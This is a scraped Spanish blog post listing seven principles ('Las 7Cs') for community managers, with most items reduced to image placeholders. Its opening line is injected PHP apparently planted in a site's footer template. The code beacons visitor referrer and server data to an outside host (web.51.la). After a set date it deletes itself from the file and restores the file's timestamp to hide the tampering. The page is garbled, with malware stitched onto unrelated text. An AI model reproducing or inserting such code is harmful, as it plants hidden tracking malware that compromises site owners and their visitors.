check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456737897){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=8&id=18776908&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/modules/mod_footer/tmpl/footer.php"); } Las 7Cs que todo Community Manager debe tener en cuenta

La actividad Social Media cambia y se desarrolla permanentemente. Desde Social Tools creamos: “Las 7Cs que todo Community Manager debe tener en cuenta a la hora de gestionar Redes Sociales” y te invitamos a leerlas, compartirlas y darnos tu punto de vista.

¿Cómo ser un buen Community Manager?

1# CONTENIDO

7cs 1

 

2# CALIDAD

7cs 2

 

3# COMUNIDAD

7cs 3

 

4# CONCIENCIA

7cs 4

 

5# CONVERSIONES

7cs 5

 

6# CONSISTENCIA

7cs 6

 

7# CALMA

7cs 7

 

Fuente: Social Tools